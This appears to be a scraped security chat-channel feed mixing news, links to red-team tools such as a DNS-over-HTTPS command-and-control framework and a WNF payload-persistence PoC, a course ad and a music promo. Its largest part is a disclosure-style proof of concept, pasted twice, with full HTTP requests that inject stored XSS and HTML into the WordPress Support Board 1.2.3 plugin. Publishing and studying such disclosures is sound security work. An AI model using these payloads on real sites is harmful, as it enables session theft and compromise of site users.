Forwarded from Allan
MuySeguridad
Revelan en Twitter otra vulnerabilidad 0-Day en Windows
Un investigador que en agosto publicó en Twitter un error de escalada de privilegios de Windows , ha publicado otra vulnerabilidad 0-Day en Windows para Un investigador ha publicado otra vulnerabilidad 0-Day en Windows para la que no existe solución.
WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting
---------------------
# Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting
# Date: 2018-10-16
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://schiocco.com/
# Software Link : https://board.support/
# Software : Support Board - Chat And Help Desk
# Version : v1.2.3
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection and Stored XSS
# CVE : N/A
# In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress,
# a Stored XSS vulnerability has been discovered in file upload areas in the
# Chat and Help Desk sections via the msg parameter
# in a /wp-admin/admin-ajax.php sb_ajax_add_message action.
# HTTP POST Request : [Stored XSS]
----------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/chat/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 450
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close
action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
# In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin,
# the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and
# file upload areas in the Chat and Help Desk sections of Schiocco.
# HTTP POST Request : [HTML Injection]
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/desk-demo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close
action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
---------------------
# Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting
# Date: 2018-10-16
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://schiocco.com/
# Software Link : https://board.support/
# Software : Support Board - Chat And Help Desk
# Version : v1.2.3
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection and Stored XSS
# CVE : N/A
# In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress,
# a Stored XSS vulnerability has been discovered in file upload areas in the
# Chat and Help Desk sections via the msg parameter
# in a /wp-admin/admin-ajax.php sb_ajax_add_message action.
# HTTP POST Request : [Stored XSS]
----------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/chat/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 450
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close
action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
# In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin,
# the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and
# file upload areas in the Chat and Help Desk sections of Schiocco.
# HTTP POST Request : [HTML Injection]
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/desk-demo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
Connection: close
action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
Red Teaming .. https://github.com/SpiderLabs/DoHC2
GitHub
GitHub - SpiderLabs/DoHC2: DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be…
DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). - SpiderLabs/DoHC2
Forwarded from Ivan Chavero
antes que nada disculpen el spam pero está cabrón esta onda del youtube, espero que les guste la nueva rola de mi banda Seis Pistos
https://www.youtube.com/watch?v=l5iD9eqr6IM
https://www.youtube.com/watch?v=l5iD9eqr6IM
YouTube
Seis Pistos SuperCero ft. Lng/Sht
Super Cero de Seis Pistos ft. LNG/Sht producito por Tito Fuentes
Síguenos en:
Spotify: https://open.spotify.com/track/6rtVQQ9BlEszAaMHBmhrHg
Twtiter: https://twitter.com/seispistos
Instagram: https://www.instagram.com/seis_pistos/
Letra:
Antes peleaba mas…
Síguenos en:
Spotify: https://open.spotify.com/track/6rtVQQ9BlEszAaMHBmhrHg
Twtiter: https://twitter.com/seispistos
Instagram: https://www.instagram.com/seis_pistos/
Letra:
Antes peleaba mas…
The PoC dropper/malware example from @dafthack and my Covert Attack Mystery Box. Weaponized Windows Kernel WNF for side-channel data persistence
https://github.com/ustayready/CasperStager
https://github.com/ustayready/CasperStager
GitHub
GitHub - ustayready/CasperStager: PoC for persisting .NET payloads in Windows Notification Facility (WNF) state names using low…
PoC for persisting .NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls. - ustayready/CasperStager
Technical Rundown of WebExec (CVE-2018-15442) - Cisco Webex Meetings Desktop App for Windows RCE with SYSTEM privileges https://blog.skullsecurity.org/2018/technical-rundown-of-webexec
Pocos lugares para el curso Web Penetration Tester en #CDMX. !!
El 8 y 9 de Noviembre !!
Más información en :
https://tpx.mx/cursos/web-penetration-tester/cdmx
El 8 y 9 de Noviembre !!
Más información en :
https://tpx.mx/cursos/web-penetration-tester/cdmx
PoC for persisting .NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls.
https://github.com/ustayready/CasperStager
https://github.com/ustayready/CasperStager
GitHub
GitHub - ustayready/CasperStager: PoC for persisting .NET payloads in Windows Notification Facility (WNF) state names using low…
PoC for persisting .NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls. - ustayready/CasperStager